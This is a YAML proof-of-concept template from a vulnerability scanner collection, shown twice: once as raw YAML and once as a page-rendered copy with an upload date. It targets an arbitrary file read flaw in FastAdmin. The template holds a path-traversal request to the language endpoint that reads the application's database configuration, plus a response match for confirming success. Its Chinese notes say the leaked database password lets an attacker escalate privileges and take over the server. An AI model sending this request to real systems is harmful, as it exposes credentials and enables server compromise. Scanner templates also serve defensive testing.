Poc_Scanner/poc/Frame-Poc/Fastadmin-lang-ReadFile.yaml

keyword: fastadmin
name: fastadmin任意文件读取漏洞
description: |
  该漏洞会造成数据库密码泄露
requests: 
  path: "/index/ajax/lang?lang=..//..//application/database"
  method: GET
  headers:
    User-agent: 
    Content-length: 
    Accept: 
    Content-type: 
    Accept-Encoding: 
    Cookie: 
    Referer: 
    X-Forwarded-For: 
  body-raw: |-

response: 
  path: "" 
  status-code: 200
  body: "database"
  headers:
    Server: 
    Content-type: 
    Content-length: 
    Date: 
    Connection: 
impact: |
  数据库密码泄露过后，攻击者可获取数据库操作权限进行提权然后攻陷服务器。
首次上传 2024-10-09 15:15:50 +08:00			`keyword: fastadmin`
			`name: fastadmin任意文件读取漏洞`
			`description: \|`
			`该漏洞会造成数据库密码泄露`
			`requests:`
			`path: "/index/ajax/lang?lang=..//..//application/database"`
			`method: GET`
			`headers:`
			`User-agent:`
			`Content-length:`
			`Accept:`
			`Content-type:`
			`Accept-Encoding:`
			`Cookie:`
			`Referer:`
			`X-Forwarded-For:`
			`body-raw: \|-`

			`response:`
			`path: ""`
			`status-code: 200`
			`body: "database"`
			`headers:`
			`Server:`
			`Content-type:`
			`Content-length:`
			`Date:`
			`Connection:`
			`impact: \|`
			`数据库密码泄露过后，攻击者可获取数据库操作权限进行提权然后攻陷服务器。`